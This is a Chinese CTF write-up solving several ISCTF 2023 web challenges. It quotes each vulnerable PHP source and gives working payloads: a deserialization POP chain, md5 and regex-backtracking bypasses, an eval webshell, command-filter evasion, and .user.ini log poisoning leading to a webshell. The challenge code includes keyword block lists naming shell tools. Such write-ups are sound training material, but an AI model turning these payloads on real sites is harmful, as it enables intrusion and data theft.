isctf2023web部分wp

圣杯战争!!!:

<?php highlight_file(__FILE__); error_reporting(0); class artifact{   public $excalibuer;   public $arrow;   public function __toString(){     echo "为Saber选择了对的武器!<br>";     return $this->excalibuer->arrow;   } } class prepare{   public $release;   public function __get($key){     $functioin = $this->release;     echo "蓄力!咖喱棒!!<br>";     return $functioin();   } } class saber{   public $weapon;   public function __invoke(){     echo "胜利!<br>";     include($this->weapon);   } } class summon{   public $Saber;   public $Rider;   public function __wakeup(){     echo "开始召唤从者!<br>";     echo $this->Saber;   } }

链子:summon->artifact->prepare->saber

<?php
class artifact{
    public $excalibuer;
    public $arrow;
}

class prepare{
    public $release;
}
class saber{
    public $weapon;
}
class summon{
    public $Saber;
    public $Rider;
}
$a = new summon();
$b = new artifact();
$c = new prepare();
$d = new saber();
$a -> Saber = $b;
$b -> excalibuer = $c;
$c -> release = $d;
$d -> weapon = "php://filter/convert.base64-encode/resource=flag.php";
echo serialize($a);

绕进你的心里:

<?php highlight_file(__FILE__); error_reporting(0); require 'flag.php'; $str = (String)$_POST['pan_gu']; $num = $_GET['zhurong']; $lida1 = $_GET['hongmeng']; $lida2 = $_GET['shennong']; if($lida1 !== $lida2 && md5($lida1) === md5($lida2)){   echo "md5绕过了!";   if(preg_match("/[0-9]/", $num)){     die('你干嘛?哎哟!');   }   elseif(intval($num)){     if(preg_match('/.+?ISCTF/is', $str)){       die("再想想!");     }     if(stripos($str, '2023ISCTF') === false){       die("就差一点点啦!");     }     echo $flag;   } } ?>

这个首先是md5绕过,进行数组绕过,然后绕过preg_match函数再进行绕过这个:

if(preg_match(‘/.+?ISCTF/is’, $str)){ die(“再想想!”); } if(stripos($str, ‘2023ISCTF’) === false){ die(“就差一点点啦!”); }

import requests

data = {
    'pan[gu': 'a'*1000000 + '2023ISCTF'
}

res = requests.post('http://gz.imxbt.cn:20215/?hongmeng[]=1&shennong[]=2&zhurong[]=a',
                    data=data, allow_redirects=False)
print(res.text)

Where is the flag:

<?php //flag一分为3,散落在各处,分别是:xxxxxxxx、xxxx、xxx。 highlight_file(__FILE__); //标准一句话木马~ eval($_POST[1]); ?>

简单直接:1=system(‘env’); 显示当前的环境变量,没想到直接出来了

wafr:

RCE的题,

<?php /* Read /flaggggggg.txt */ error_reporting(0); header('Content-Type: text/html; charset=utf-8'); highlight_file(__FILE__); if(preg_match("/cat|tac|more|less|head|tail|nl|sed|sort|uniq|rev|awk|od|vi|vim/i", $_POST['code'])){//strings   die("想读我文件?大胆。"); } elseif (preg_match("/\^|\||\~|\\$|\%|jay/i", $_POST['code'])){   die("无字母数字RCE?大胆!"); } elseif (preg_match("/bash|nc|curl|sess|\{|:|;/i", $_POST['code'])){   die("奇技淫巧?大胆!!"); } elseif (preg_match("/fl|ag|\.|x/i", $_POST['code'])){   die("大胆!!!"); } else{   assert($_POST['code']); }

简单,code=system(‘ca\t f*’)%0c

Fuzz!:

<?php /* Read /flaggggggg.txt Hint: 你需要学会fuzz,看着键盘一个一个对是没有灵魂的 知识补充:curl命令也可以用来读取文件哦,如curl file:///etc/passwd */ error_reporting(0); header('Content-Type: text/html; charset=utf-8'); highlight_file(__FILE__); $file = 'file:///etc/passwd'; if(preg_match("/\`|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\\\\|\'|\"|\;|\<|\>|\,|\?|jay/i", $_GET['file'])){   die('你需要fuzz一下哦~'); } if(!preg_match("/fi|le|flag/i", $_GET['file'])){   $file = $_GET['file']; } system('curl '.$file);

新学俩个知识点:[a-z]可以绕过任意一个字母,”|”没过滤可以放在开头结束前面的curl,然后再拼接系统命令

payload:?file=|tac /fl[a-z]ggggggg.txt 然后还有一个:?file=f{i}l{e}:///fla{g}gggggg.txt 进行file://读取文件指在本地系统里面读取文件

ez_ini:

发现是文件上传,进行上传文件传.user.ini.png什么的,然后在bp里面进行改成.user.ini ,

内容:GIF89a
auto_prepend_file=/var/log/nginx/access.log

在UA头上面传小🐎,然后蚁剑直接连就行了;